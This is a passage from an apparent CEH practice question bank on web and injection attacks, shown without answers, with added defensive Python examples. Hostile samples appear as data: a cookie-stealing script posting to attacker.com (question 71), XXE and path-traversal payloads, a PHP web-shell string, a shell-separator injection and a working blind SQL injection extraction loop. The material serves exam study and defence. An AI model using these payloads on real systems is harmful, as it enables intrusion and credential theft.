© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

CEH Web Application and Injection Attacks — All Questions With Answers

Complete CEH Web Application and Injection Attacks question bank, with answers and detailed explanations.
Question 1 (medium, multiple choice)

A security analyst notices that the web application returns different response times when a valid username is submitted versus an invalid one during login. Which type of vulnerability is likely being exploited?

Question 2 (easy, multiple choice)

Which of the following tools is commonly used to automate the detection and exploitation of SQL injection vulnerabilities?

Question 3 (hard, multiple choice)

A penetration tester intercepts the following request using Burp Suite:

POST /change_password HTTP/1.1
Host: example.com
Cookie: sessionid=abc123; SameSite=Lax
Content-Type: application/x-www-form-urlencoded

new_password=Hacker123

The tester successfully crafts a CSRF attack by embedding a hidden form in a malicious page. Which mitigation is most likely missing?

Question 4 (medium, multiple choice)

A web application allows users to upload profile pictures. An attacker uploads a file named "profile.php" containing malicious PHP code. When the attacker visits the uploaded file's URL, the code executes. Which vulnerability is being exploited?

Question 5 (medium, multiple choice)

An analyst observes the following log entry on a web server: GET /../../etc/passwd HTTP/1.1 200. Which type of attack is indicated?

Question 6 (hard, multiple choice)

During a penetration test, a tester uses the following payload in a search field: <script>alert(document.cookie)</script>. The payload is reflected in the response without sanitization. However, the tester notices that the attack only works when the payload is submitted via a POST request, not GET. Which type of XSS is this?

Question 7 (easy, multiple choice)

Which of the following is the primary purpose of using a CSRF token in a web application?

Question 8 (medium, multiple choice)

A web application uses user input in the following PHP code: include($_GET['page'] . '.php');. An attacker submits the URL: http://example.com/index.php?page=../../../../etc/passwd%00. Which two vulnerabilities are being attempted?

Question 9 (medium, multiple choice)

Which Burp Suite tool is most appropriate for modifying and re-sending a single HTTP request multiple times with different payloads to test for SQL injection?

Question 10 (hard, multiple choice)

A penetration tester finds that a web application accepts XML input and returns the parsed data in the response. The tester submits the following payload: <?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The server returns the contents of /etc/passwd. Which vulnerability is being exploited?
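
Questions 10, 27, 38, 55 and 102 all turn on the same XXE payload. The block below is an added example, not code from the question bank or from any vendor: a Python pre-check that refuses any DTD or entity declaration before the document reaches a parser, which is the parser-independent way to close XXE. XXE_PAYLOAD and BENIGN_DOC are constructed inputs.

```python
import re
import xml.etree.ElementTree as ET

# Constructed inputs: the XXE payload shape quoted in the question, and a
# benign document with the same structure.
XXE_PAYLOAD = (
    '<?xml version="1.0"?>'
    '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    '<root>&xxe;</root>'
)
BENIGN_DOC = '<?xml version="1.0"?><root>hello</root>'

# Any DOCTYPE or ENTITY declaration is refused before a parser sees the
# document. Disabling DTDs outright is the mitigation recommended for XXE:
# it also blocks parameter entities and entity-expansion ("billion laughs").
_DTD_MARKERS = re.compile(r"<!(?:DOCTYPE|ENTITY)\b", re.IGNORECASE)


class UnsafeXMLError(ValueError):
    """Raised when an untrusted document tries to declare a DTD or entity."""


def assert_no_dtd(xml_text: str) -> None:
    if _DTD_MARKERS.search(xml_text):
        raise UnsafeXMLError("DTD and entity declarations are not accepted")


def parse_untrusted(xml_text: str) -> str:
    """Return the text content of <root>, refusing any document with a DTD.

    xml.etree (expat) does not fetch external entities itself, but the same
    payload handed to a parser configured to resolve external entities
    (several XML libraries did so by default) returns the contents of
    /etc/passwd. Rejecting the DTD up front makes the outcome independent
    of parser defaults.
    """
    assert_no_dtd(xml_text)
    root = ET.fromstring(xml_text)
    return root.text or ""


def is_refused(xml_text: str) -> bool:
    """True if parse_untrusted() rejects the document as unsafe."""
    try:
        parse_untrusted(xml_text)
    except UnsafeXMLError:
        return True
    return False
```

Where DTDs are genuinely needed, the equivalent in a real deployment is to keep the DTD but disable external entity resolution in the parser (for example defusedxml in Python, or the library's "resolve external entities" feature switched off); the pre-check above is the simpler policy when no DTD is ever expected.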

Question 11 (easy, multiple choice)

An attacker attempts to log into a web application by trying many common passwords for a list of known usernames. Which type of authentication attack is this?

Question 12 (medium, multiple choice)

A security analyst wants to check if a web application is vulnerable to Server-Side Request Forgery (SSRF). Which of the following actions would be most effective?

Question 13 (medium, multi select)

Which TWO of the following are effective mitigations against Cross-Site Request Forgery (CSRF)?

Question 14 (hard, multi select)

A web application is vulnerable to SQL injection. Which THREE of the following techniques can be used to extract data from the database using blind SQL injection?

Question 15 (easy, multi select)

Which TWO of the following are characteristics of stored (persistent) XSS?

Question 16 (medium, multiple choice)

A security analyst observes that after a user submits a comment on a blog, the comment is displayed immediately on the page without sanitization. Another user visits the page and the comment's JavaScript executes in their browser. Which type of XSS attack is this?

Question 17 (easy, multiple choice)

Which of the following tools is primarily used for automated SQL injection exploitation and database fingerprinting?

Question 18 (medium, multiple choice)

A penetration tester needs to perform a brute-force attack on a web application login form. Which Burp Suite tool is specifically designed for automating parameterized attacks like password guessing?

Question 19 (hard, multiple choice)

A web application uses a parameter 'file' to include server-side files. The following request is intercepted: GET /page.php?file=../../../etc/passwd HTTP/1.1. The response contains the contents of /etc/passwd. This vulnerability is most likely which of the following?

Question 20 (medium, multiple choice)

Which of the following is a recommended defense against Cross-Site Request Forgery (CSRF) attacks?

Question 21 (hard, multiple choice)

A tester sends the following payload to a web application: %3Cscript%3Ealert('XSS')%3C/script%3E. The application echoes back the decoded payload in the response without sanitization. This behavior is typical of which type of vulnerability?

Question 22 (easy, multiple choice)

An attacker discovers that a web application's login form allows unlimited login attempts. The attacker uses a list of usernames and passwords obtained from a previous breach to gain access. This attack is known as:

Question 23 (medium, multiple choice)

A penetration tester is assessing a web application and notices that the application reflects the User-Agent header in the response body without sanitization. What attack could be performed using this behavior?

Question 24 (hard, multiple choice)

An attacker sends a request to a web server with the following header: X-Forwarded-For: 127.0.0.1. The server processes the request as if it came from localhost and grants administrative access. This is an example of:
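
The server in question 24 trusted a client-supplied header. The following is an added example, not code from the question bank: how a Python back end should derive the client address when it sits behind known proxies, so that X-Forwarded-For: 127.0.0.1 from the internet never reads as localhost. The TRUSTED_PROXIES range and the addresses in the usage are constructed.

```python
import ipaddress
from typing import Optional

# Constructed: address range of the reverse proxies/load balancers that sit
# in front of the application. Only they may set X-Forwarded-For.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]


def _is_trusted_proxy(addr) -> bool:
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr: str, xff_header: Optional[str]) -> str:
    """Determine the client address without trusting an attacker-set header.

    The TCP peer (remote_addr) is the only address the server observed.
    X-Forwarded-For is honoured only when that peer is one of our proxies,
    and even then the chain is walked from the right: each proxy appends the
    address it saw, so the rightmost entries were written by our proxies and
    everything left of the first untrusted hop came from the client (the
    "127.0.0.1" in the question).
    """
    peer = ipaddress.ip_address(remote_addr)
    if not _is_trusted_proxy(peer) or not xff_header:
        return str(peer)
    for hop in reversed([h.strip() for h in xff_header.split(",")]):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return str(peer)  # malformed header: fall back to the peer
        if not _is_trusted_proxy(addr):
            return str(addr)
    return str(peer)  # every hop was one of ours


def is_local_admin_request(remote_addr: str, xff_header: Optional[str]) -> bool:
    """The check the vulnerable server got wrong: grant the localhost-only
    privilege from the derived client address, never from a header."""
    return ipaddress.ip_address(client_ip(remote_addr, xff_header)).is_loopback
```

The same rule applies to X-Real-IP, Forwarded, and any header a framework's "trust proxy" setting reads: either the proxy strips and rewrites the header, or the application only believes it from the proxy's own addresses.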

Question 25 (easy, multiple choice)

Which of the following is a symptom of a successful command injection attack?
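
Questions 25 and 57 (the cgi-bin request with cmd=id) describe command injection by its symptoms. The following is an added example, not code from the question bank: the vulnerable pattern beside two hardened forms, in Python. INJECTED_HOST is a constructed attacker value, and printf stands in for the ping/nslookup binary a real endpoint would call, so the block runs offline; the injected command is an echo rather than id so the run is harmless while the injection stays visible in the output.

```python
import re
import subprocess

# Constructed attacker input: a hostname, a command separator, and a second
# command. In the question the injected command is `id`; here it is an echo
# so the example is safe to run and the injection is still visible.
INJECTED_HOST = "example.com; echo INJECTED"

# Allow-list for the one kind of value this endpoint should ever receive.
HOSTNAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9.-]{0,252}$")


def lookup_vulnerable(host: str) -> str:
    """User input pasted into a shell command line (the CGI cmd= pattern).
    `printf` stands in for ping/nslookup so nothing touches the network."""
    completed = subprocess.run(
        f"printf '%s' {host}", shell=True, capture_output=True, text=True
    )
    return completed.stdout


def lookup_argv(host: str) -> str:
    """No shell: the value is one argv element, so ';' is just a character.
    This alone neutralises shell metacharacters; see lookup_hardened for
    why validation is still wanted."""
    completed = subprocess.run(
        ["printf", "%s", host], capture_output=True, text=True
    )
    return completed.stdout


def lookup_hardened(host: str) -> str:
    """Allow-list validation plus argv execution. Validation matters even
    without a shell: the called program interprets its own arguments (a
    leading '-' becomes an option; some tools accept URLs with credentials
    or @file syntax)."""
    if not HOSTNAME_RE.match(host):
        raise ValueError(f"rejected host value: {host!r}")
    return lookup_argv(host)


def is_rejected(host: str) -> bool:
    try:
        lookup_hardened(host)
    except ValueError:
        return True
    return False
```

The symptom the question asks about is visible in lookup_vulnerable: the response carries output that the intended command could never have produced.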

Question 26 (medium, multiple choice)

A web developer wants to mitigate CSRF attacks. Which of the following configurations for cookies is most effective when combined with CSRF tokens?

Question 27 (hard, multiple choice)

During an assessment, a tester discovers that the web application accepts XML input and returns the parsed data. The tester submits the following payload: <!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>. The response contains the contents of /etc/passwd. This vulnerability is known as:

Question 28 (medium, multi select)

Which TWO of the following are effective defenses against SQL injection attacks?

Question 29 (medium, multi select)

Which THREE of the following are common indicators of an ongoing brute-force attack against a web application?

Question 30 (hard, multi select)

Which TWO of the following are valid methods to exploit or test for Server-Side Request Forgery (SSRF)?

Question 31 (medium, multiple choice)

A security analyst notices that after submitting a form on a web application, the URL changes to include the user's ID parameter, e.g., 'user?id=123'. The analyst modifies the ID in the URL and accesses another user's profile without authorization. Which type of vulnerability is being exploited?

Question 32 (easy, multiple choice)

Which Burp Suite tool is specifically designed to automate customized attacks on web applications, such as brute-forcing login forms or fuzzing parameters?

Question 33 (hard, multiple choice)

During a penetration test, a tester uses SQLMap with the following command: 'sqlmap -u "http://target.com/page?id=1" --os-shell'. The target is a Linux server running MySQL. Which SQL injection technique will SQLMap likely attempt to use to achieve an OS shell?

Question 34 (medium, multiple choice)

A web application allows users to upload profile pictures. The application uses the filename provided by the user to save the file on the server. An attacker uploads a file named 'malicious.php%00.png' and the server saves it as 'malicious.php'. Which vulnerability is being exploited?

Question 35 (easy, multiple choice)

Which of the following is the BEST defense against brute-force attacks on a login form?

Question 36 (medium, multiple choice)

A penetration tester discovers that a web application includes the following code: 'include($_GET['page'] . '.php');' and the application is running on a Linux server. The tester attempts to exploit this by accessing 'index.php?page=../../etc/passwd'. What type of attack is this, and will it succeed?
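
Questions 8, 19, 36, 49, 65, 80, 92 and 111 are all variations on the include($_GET['page'] . '.php') pattern. The following is an added example, not code from the question bank: a Python resolver that maps the same parameter to a file path and closes each of the holes those questions exploit (traversal, the %00 truncation of the appended extension, absolute paths and remote URLs), next to the allow-list form that needs no path logic at all. WEB_ROOT and KNOWN_PAGES are constructed.

```python
import posixpath
from urllib.parse import unquote

# Constructed directory the application is allowed to include pages from.
WEB_ROOT = "/var/www/app/pages"

# Strongest option: the parameter selects from a fixed set of known pages.
KNOWN_PAGES = {"home", "about", "contact"}


class PathRejected(ValueError):
    """Raised when a user-supplied page value must not be resolved."""


def resolve_page(user_value: str, root: str = WEB_ROOT) -> str:
    """Map an untrusted 'page' parameter to a file path under root.

    Mirrors include($_GET['page'] . '.php') from the question but closes
    each hole it has: the value is percent-decoded exactly once; a NUL byte
    is refused (the %00 trick that truncated the appended '.php' in old PHP);
    URLs and absolute paths are refused (remote and absolute file inclusion);
    the extension is appended before normalisation; and the normalised path
    must still start with root, which is the check that actually matters.
    """
    value = unquote(user_value)
    if "\x00" in value:
        raise PathRejected("NUL byte in value")
    if "://" in value or value.startswith(("/", "\\")):
        raise PathRejected("URL or absolute path")
    candidate = posixpath.normpath(posixpath.join(root, value + ".php"))
    if posixpath.commonpath([root, candidate]) != root:
        raise PathRejected("escapes web root")
    return candidate


def resolve_page_allowlist(user_value: str, root: str = WEB_ROOT) -> str:
    """Preferred form: no path arithmetic on user input at all."""
    if user_value not in KNOWN_PAGES:
        raise PathRejected("unknown page")
    return posixpath.join(root, user_value + ".php")


def is_rejected(user_value: str) -> bool:
    try:
        resolve_page(user_value)
    except PathRejected:
        return True
    return False
```

On question 36 specifically: the traversal in index.php?page=../../etc/passwd reaches the file, but the code appends '.php', so the include targets /etc/passwd.php; with the NUL byte of question 8 on a PHP version that still honoured it, the suffix was cut off and the include succeeded. resolve_page refuses both.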

Question 37 (hard, multiple choice)

An attacker wants to perform a CSRF attack against a banking application. The application uses SameSite cookies set to 'Strict'. The attacker hosts a malicious page on their own domain. When the victim visits the malicious page, which of the following statements is TRUE regarding the CSRF attack?
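
Questions 3, 7, 13, 20, 26, 37, 66, 89 and 110 all ask how SameSite cookies and CSRF tokens combine. The following is an added example, not code from the question bank or from any browser vendor: a small Python model of when a browser attaches a cookie for each SameSite value, plus a session-bound synchroniser token and the /change_password handler from question 3 using both. The server key is constructed; the model reflects the rules browsers apply to an explicit SameSite attribute, with the Chrome default-Lax exception noted in the comment.

```python
import hashlib
import hmac
import secrets


def cookie_attached(samesite: str, cross_site: bool, method: str,
                    top_level_navigation: bool) -> bool:
    """Model of when a browser sends a cookie with the given SameSite value.

    Strict: never on a cross-site request, even a link the user clicks.
    Lax:    only on top-level navigations with a safe method (GET/HEAD);
            a hidden <form method=POST> on another site, an <img>, or a
            fetch() gets no cookie. (Chrome treats cookies set *without*
            the attribute as Lax but still sends them on POST for two
            minutes after they are set; an explicit Lax has no such gap.)
    None:   always attached; must also carry the Secure flag.
    """
    if not cross_site:
        return True
    value = (samesite or "None").lower()
    if value == "strict":
        return False
    if value == "lax":
        return top_level_navigation and method.upper() in ("GET", "HEAD")
    return True


# Constructed server-side key for the token; persist and rotate in real use.
_CSRF_KEY = secrets.token_bytes(32)


def issue_csrf_token(session_id: str) -> str:
    """Synchroniser token bound to the session: an HMAC over the session id,
    so it cannot be forged without the key and is useless for other sessions."""
    return hmac.new(_CSRF_KEY, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf_token(session_id: str, submitted: str) -> bool:
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(expected, submitted or "")


def change_password_allowed(session_id: str, method: str, form: dict,
                            cookie_present: bool) -> bool:
    """The /change_password handler from question 3 with both defences:
    state changes only on POST, the session cookie must have reached us
    (cookie_present comes from cookie_attached in the caller), and the form
    must carry a token valid for that session."""
    if method.upper() != "POST":
        return False
    if not cookie_present:
        return False  # no session cookie arrived: unauthenticated request
    return verify_csrf_token(session_id, form.get("csrf_token", ""))
```

Why both: SameSite protects only requests that cross a site boundary, so a state-changing GET, an attacker-controlled sibling subdomain, or a browser that ignores the attribute still needs the token; the token protects only forms that carry it, so the cookie attribute is the backstop for endpoints someone forgot to cover.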

Question 38 (medium, multiple choice)

A web application uses XML to transmit data between client and server. A tester submits the following payload: '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. The application returns the content of the /etc/passwd file in the response. Which vulnerability is present?

Question 39 (medium, multiple choice)

During a web application test, an analyst intercepts a request containing a 'Referer' header that points to a different domain. The analyst modifies the request by removing the 'Referer' header and the action still executes successfully. Which type of attack is the analyst testing?

Question 40 (easy, multiple choice)

Which of the following is a common indicator of a stored (persistent) Cross-Site Scripting (XSS) attack?

Question 41 (hard, multiple choice)

A web application firewall (WAF) blocks requests containing ' UNION SELECT '. A penetration tester wants to bypass this restriction to perform a union-based SQL injection. Which of the following techniques is MOST likely to succeed?

Question 42 (medium, multiple choice)

An organization wants to prevent directory listing on its Apache web server. Which of the following configuration changes would achieve this?

Question 43 (medium, multi select)

Which TWO of the following are effective mitigations against Clickjacking attacks? (Choose 2)

Question 44 (hard, multi select)

Which THREE of the following are types of SQL injection attacks? (Choose 3)

Question 45 (easy, multi select)

Which TWO of the following are common tools used for web application security testing? (Choose 2)

Question 46 (easy, multiple choice)

A security analyst notices that a web application returns different page sizes when a valid user ID is submitted versus an invalid one in the URL parameter. Which type of vulnerability is most likely being exploited?

Question 47 (easy, multiple choice)

Which of the following tools is specifically designed to automate the process of detecting and exploiting SQL injection vulnerabilities in web applications?

Question 48 (medium, multiple choice)

During a web application penetration test, a tester submits a comment containing '<script>alert("XSS")</script>' and the script executes for all users who view the comment. Which type of cross-site scripting (XSS) vulnerability is present?

Question 49 (medium, multiple choice)

A web application uses a URL parameter to fetch a file from the server, e.g., 'download.php?file=report.pdf'. An attacker changes the parameter to '../../etc/passwd' and retrieves the password file. This attack is known as:

Question 50 (medium, multiple choice)

Which of the following is the most effective defense against Cross-Site Request Forgery (CSRF) attacks?

Question 51 (hard, multiple choice)

An attacker intercepts a request and notices that the server reflects the value of the 'User-Agent' header in the response without sanitization. The attacker crafts a payload that triggers an alert box. This is an example of:

Question 52 (medium, multiple choice)

In Burp Suite, which tool is used to modify and resend individual HTTP requests to observe responses, allowing manual testing of input validation and parameter manipulation?

Question 53 (hard, multiple choice)

A penetration tester finds that a web application allows uploading a file with the name '../../var/www/html/shell.php'. The file is successfully written to the server. Which combination of vulnerabilities does this exploit?
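
Questions 4, 34 and 53 are three ways an upload handler that trusts the client's filename goes wrong. The following is an added example, not code from the question bank: a Python upload policy that never uses the client name as a path, refuses the NUL byte of question 34, checks the last extension against an allow-list, checks the content's magic bytes, and stores under a random name. UPLOAD_DIR, ALLOWED_TYPES and the sample contents are constructed.

```python
import posixpath
import secrets
from urllib.parse import unquote

# Constructed: where uploads are written. This directory must be served as
# static content with script execution disabled (or live outside the web
# root); naming rules alone are not the whole defence, since image
# polyglots can carry PHP past a magic-byte check.
UPLOAD_DIR = "/var/www/uploads"

# Allowed types and the leading bytes ("magic") each must start with.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}


class UploadRejected(ValueError):
    """Raised when an upload must not be written to disk."""


def storage_path(client_filename: str, content: bytes) -> str:
    """Decide where (and whether) to store an uploaded file.

    The client's name is never used as the path. basename() drops the
    directory part of '../../var/www/html/shell.php'; a NUL byte is refused
    so 'malicious.php%00.png' cannot be truncated to 'malicious.php' by a
    lower-level API; the last extension must be on the allow-list; the
    content must begin with that type's magic bytes; and the stored name
    is random, so whatever the client called the file is irrelevant.
    """
    name = unquote(client_filename)
    if "\x00" in name:
        raise UploadRejected("NUL byte in filename")
    base = posixpath.basename(name.replace("\\", "/"))
    if "." not in base:
        raise UploadRejected("no extension")
    ext = base.rsplit(".", 1)[1].lower()
    magic = ALLOWED_TYPES.get(ext)
    if magic is None:
        raise UploadRejected(f"extension {ext!r} not allowed")
    if not content.startswith(magic):
        raise UploadRejected("content does not match declared type")
    return posixpath.join(UPLOAD_DIR, f"{secrets.token_hex(16)}.{ext}")


def is_rejected(client_filename: str, content: bytes) -> bool:
    try:
        storage_path(client_filename, content)
    except UploadRejected:
        return True
    return False


# Constructed sample contents.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PHP_SAMPLE = b"<?php system($_GET['cmd']); ?>"
```

Question 53 combines two bugs, traversal in the name and unrestricted upload; with this policy the first never reaches the filesystem and the second fails the extension check, and even a file that passed both lands in a directory the web server will not execute.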

Question 54 (medium, multiple choice)

Which of the following best describes a Server-Side Request Forgery (SSRF) attack?

Question 55 (hard, multiple choice)

A web application uses XML to transfer data. An attacker submits the following payload: '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><root>&xxe;</root>'. What vulnerability is being exploited?

Question 56 (easy, multiple choice)

Which of the following is a common defense against clickjacking attacks?

Question 57 (medium, multiple choice)

A security analyst observes the following in Apache access logs: 'GET /cgi-bin/test.cgi?cmd=id HTTP/1.1' 200. This is most likely an attempt at which attack?

Question 58 (medium, multi select)

Which TWO of the following are types of SQL injection? (Select 2)

Question 59 (hard, multi select)

Which THREE of the following are effective mitigations against brute force attacks on web application login forms? (Select 3)

Question 60 (medium, multi select)

Which TWO of the following attacks can be prevented by properly validating and sanitizing user input? (Select 2)

Question 61 (medium, multiple choice)

A security analyst notices that the web application returns different response times when querying user IDs. For example, a valid user ID returns the page in 2 seconds, while an invalid ID returns in 0.5 seconds. The analyst suspects a blind SQL injection vulnerability. Which SQL injection technique is MOST likely being used?
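
Questions 14, 44, 58, 61 and 88 ask what blind SQL injection is; question 28 and the parameterised-query answers ask how to stop it. The following is an added example, not code from the question bank: a constructed SQLite backend with an injectable endpoint that leaks only one bit (row found or not), the extraction loop that turns that bit into the admin password, and the bound-parameter version the same loop gets nothing from. The schema and data are constructed; the time-based variant of question 61 is described in the comment rather than run, since SQLite has no SLEEP().

```python
import sqlite3

# Constructed backend standing in for the application's database.
_db = sqlite3.connect(":memory:")
_db.executescript("""
    CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
    INSERT INTO users VALUES (1, 'admin', 's3cr3t'), (2, 'alice', 'wonder');
""")


def page_exists_vulnerable(id_param: str) -> bool:
    """Injectable endpoint. The parameter is spliced into the SQL, and the
    only thing the application reveals is whether a row came back (a normal
    page versus a 'not found' page). That single bit is the oracle."""
    row = _db.execute(f"SELECT id FROM users WHERE id = {id_param}").fetchone()
    return row is not None


def page_exists_fixed(id_param: str) -> bool:
    """Parameterised query: the value is bound as data, never parsed as SQL."""
    try:
        id_value = int(id_param)
    except ValueError:
        return False
    row = _db.execute("SELECT id FROM users WHERE id = ?", (id_value,)).fetchone()
    return row is not None


CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def extract_blind(oracle, subquery: str, max_len: int = 32) -> str:
    """Boolean-based blind extraction, one yes/no question per character.

    Each probe keeps the original condition true (id = 1) and ANDs a test on
    one character of the subquery's result. A time-based variant (the 2 s vs
    0.5 s behaviour in question 61) uses the same loop with the oracle
    replaced by 'did the response exceed the threshold', e.g. on MySQL:
    1 AND IF(substr((...),1,1)='s', SLEEP(2), 0). Binary search on the
    character's code point cuts the requests from ~36 to ~7 per position;
    the linear scan is kept here for readability.
    """
    found = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            probe = f"1 AND substr(({subquery}),{pos},1)='{ch}'"
            if oracle(probe):
                found += ch
                break
        else:
            break  # no character matched: end of the string
    return found


ADMIN_PASSWORD_SUBQUERY = "SELECT password FROM users WHERE username='admin'"
```

This is the technique sqlmap automates when it reports a "boolean-based blind" or "time-based blind" injection; the WAF-evasion question (41) is about disguising the probe string, not about changing this loop.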

Question 62 (easy, multiple choice)

Which OWASP Top 10 (2021) category describes the vulnerability where an application allows an attacker to include a remote file from an external server, leading to code execution or data disclosure?

Question 63 (medium, multiple choice)

During a web application penetration test, a tester uses Burp Suite's Repeater tool to manually manipulate a request and observe the response. After sending the same request multiple times, the application returns a 302 redirect pointing to a login page. What is the MOST likely cause?

Question 64 (hard, multiple choice)

A penetration tester is testing an IIS web server and wants to exploit a WebDAV misconfiguration to upload a web shell. Which HTTP method should the tester check to determine if WebDAV is enabled and allows file uploads?

Question 65 (medium, multiple choice)

A security analyst identifies a vulnerability where an attacker can include a local file such as '/etc/passwd' by manipulating the 'page' parameter in the URL: http://example.com/index.php?page=../../../../etc/passwd. What type of attack is this?

Question 66 (easy, multiple choice)

Which of the following is a primary purpose of the SameSite cookie attribute in mitigating CSRF attacks?

Question 67 (medium, multiple choice)

A penetration tester is using SQLMap to automate exploitation of a SQL injection vulnerability found in a login form. The tester wants to retrieve the names of all databases on the backend MySQL server. Which SQLMap flag should be used?

Question 68 (hard, multiple choice)

During a penetration test, the tester finds that the Apache server is configured with directory listing enabled on the /uploads directory. The tester navigates to http://example.com/uploads/ and sees a list of files. Which of the following is the MOST immediate security concern?

Question 69 (medium, multiple choice)

A web application is vulnerable to server-side request forgery (SSRF). An attacker sends a request that causes the server to make an internal HTTP request to http://169.254.169.254/latest/meta-data/. What is the attacker attempting to achieve?

Question 70 (easy, multiple choice)

Which of the following describes the difference between reflected and stored (persistent) cross-site scripting (XSS)?

Question 71 (medium, multiple choice)

A security analyst observes that a web application allows users to submit feedback, and after submission, the feedback is displayed on a public page. An attacker submits feedback containing the script: <script>document.location='http://attacker.com/?c='+document.cookie</script>. When an admin views the public page, the script executes. Which type of attack occurred?

Question 72 (hard, multiple choice)

During a security assessment, a tester discovers an endpoint that reflects the 'User-Agent' header in the response without sanitization. The tester wants to confirm a reflected XSS vulnerability. Which of the following payloads would be MOST effective to demonstrate the issue in a single request?
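
The XSS questions (6, 15, 16, 21, 23, 40, 48, 51, 70, 71, 72, 78, 94, 103, 109) differ only in where the untrusted value comes from; the defect is always the same, output written without encoding for its context. The following is an added example, not code from the question bank: the reflected User-Agent of questions 23 and 72 rendered unsafely and then correctly for body, attribute and URL contexts, the response headers that limit the damage of a miss, the cookie flags that blunt the document.cookie theft of question 71, and a stand-in "browser" built on Python's HTMLParser that reports whether a document would run script. The payloads are constructed.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote


def render_vulnerable(user_agent: str) -> str:
    """Header value copied into the HTML body unchanged: reflected XSS."""
    return f"<p>Your browser: {user_agent}</p>"


def render_body(user_agent: str) -> str:
    """HTML-body context: encode the five significant characters."""
    return f"<p>Your browser: {html.escape(user_agent, quote=True)}</p>"


def render_attribute(value: str) -> str:
    """Quoted-attribute context: same encoding, and the attribute must
    actually be quoted, otherwise a space starts a new attribute."""
    return f'<input name="q" value="{html.escape(value, quote=True)}">'


def render_url_param(value: str) -> str:
    """URL context: percent-encode before placing the value in a query string."""
    return f'<a href="/search?q={quote(value, safe="")}">search again</a>'


SECURITY_HEADERS = {
    # Blocks inline script even if an encoding bug slips through.
    "Content-Security-Policy": "default-src 'self'; script-src 'self'; "
                               "object-src 'none'; frame-ancestors 'none'",
    "X-Frame-Options": "DENY",               # clickjacking, older browsers
    "X-Content-Type-Options": "nosniff",
}


def session_cookie(session_id: str) -> str:
    """HttpOnly keeps document.cookie (the payload in question 71) from
    reading the session id even where a script does run."""
    return f"sessionId={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


class _ScriptFinder(HTMLParser):
    """Stand-in for a browser: records any <script> tag or on* handler.
    It parses quoting the way a browser does, so encoded quotes inside an
    attribute value do not terminate the attribute."""

    def __init__(self):
        super().__init__()
        self.found = False

    def handle_starttag(self, tag, attrs):
        if tag == "script" or any(name.startswith("on") for name, _ in attrs):
            self.found = True


def would_execute(document: str) -> bool:
    finder = _ScriptFinder()
    finder.feed(document)
    return finder.found


# Constructed payloads.
BODY_PAYLOAD = "<script>alert(document.cookie)</script>"
ATTR_PAYLOAD = '" onmouseover="alert(1)'
```

The stored/reflected/DOM distinction the questions test changes where the payload is stored and who triggers it, not the fix: encode at output for the exact context, and keep CSP and HttpOnly as the second layer.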

Question 73 (medium, multi select)

Which TWO of the following are effective defenses against CSRF attacks? (Choose 2.)

Question 74 (hard, multi select)

Which THREE of the following are common indicators of an SQL injection attack? (Choose 3.)

Question 75 (medium, multi select)

Which TWO of the following are valid techniques used in password spraying attacks? (Choose 2.)

Question 76 (medium, multiple choice)

A security analyst notices that a web application returns different HTTP responses for valid and invalid usernames during login. Which attack is this behavior most likely facilitating?

Question 77 (easy, multiple choice)

Which of the following tools is specifically designed to automate the detection and exploitation of SQL injection vulnerabilities?

Question 78 (medium, multiple choice)

A penetration tester discovers that a web application's search functionality reflects user input directly in the page source without sanitization. The tester crafts a URL like http://example.com/search?q=<script>alert('XSS')</script> and the script executes. This is an example of which type of XSS?

Question 79 (hard, multiple choice)

During a web application assessment, a tester intercepts a request and modifies the 'Referer' header. The application then performs a state-changing action without requiring a token. Which vulnerability is most likely present?

Question 80 (medium, multiple choice)

A web application allows users to access files using parameters like 'file=report.pdf'. A tester changes the parameter to '../../etc/passwd' and retrieves the system password file. This is an example of which attack?

Question 81 (easy, multiple choice)

A security team is implementing measures to prevent cross-site request forgery (CSRF) attacks. Which of the following is the most effective mitigation technique?

Question 82 (medium, multiple choice)

An analyst notices that a web application's login page returns a generic 'Invalid credentials' message regardless of whether the username is valid. This is an example of which security control?
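
Questions 1, 46, 76, 82 and 91 are all username enumeration: the login leaks whether the account exists through a different message, size or response time. The following is an added example, not code from the question bank: a Python login that leaks in both ways beside one that does the same work and returns the same answer on both failure paths, and the comparison a tester runs to tell them apart. The user store, salt and iteration count are constructed.

```python
import hashlib
import hmac
import secrets

_SALT = b"constructed-salt"          # per-user salts in real storage
_ITERATIONS = 50_000


def _hash(password: str, salt: bytes = _SALT) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)


# Constructed user store.
USERS = {"alice": _hash("correct horse battery")}
# Hash of a random string, verified whenever the username is unknown, so the
# unknown-user path costs the same as the known-user path (question 1).
_DUMMY_HASH = _hash(secrets.token_hex(16))


def login_leaky(username: str, password: str):
    """Returns early with a distinct message when the user does not exist:
    the response differs in text, and in time, because no hash is computed."""
    if username not in USERS:
        return 401, "Unknown user"
    if not hmac.compare_digest(USERS[username], _hash(password)):
        return 401, "Wrong password"
    return 200, "OK"


def login_uniform(username: str, password: str):
    """Same work and same response on both failure paths (question 82)."""
    stored = USERS.get(username, _DUMMY_HASH)
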